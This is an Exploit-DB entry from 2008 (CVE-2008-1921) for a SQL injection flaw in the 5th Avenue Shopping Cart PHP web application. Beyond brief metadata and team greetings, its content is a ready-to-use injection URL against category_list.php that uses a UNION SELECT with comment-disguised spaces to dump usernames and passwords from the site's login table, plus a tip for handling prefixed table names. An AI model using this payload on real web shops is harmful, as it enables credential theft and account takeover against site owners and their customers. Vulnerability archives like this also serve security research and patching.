5th Avenue Shopping Cart category_ID SQL Injection Vulnerability

2008-04-18T00:00:00
ID EDB-ID:5464
Type exploitdb
Reporter Aria-Security Team
Modified 2008-04-18T00:00:00

Description

5th Avenue Shopping Cart (category_ID) SQL Injection Vulnerability. CVE-2008-1921. Webapps exploit for php platform

                                        
                                            Aria-Security Team (Persian Security Team)
http://Aria-Security.Net (Persian)
http://Aria-Security.com (ENG)
--------------------------------------------
5th avenue Shopping Cart SQL Injection
Greetz: AurA, Kinglet, NULL


category_list.php?category_ID=-1/**/UNION/**/SELECT/**/1,username,password,4,5,6,7,8,9,10,11,12,13,14,15/**/FROM/**/login/*

note: if error says :table login does not exist the website is using a prefix for tables.


Regards,
The-0utl4w

# milw0rm.com [2008-04-18]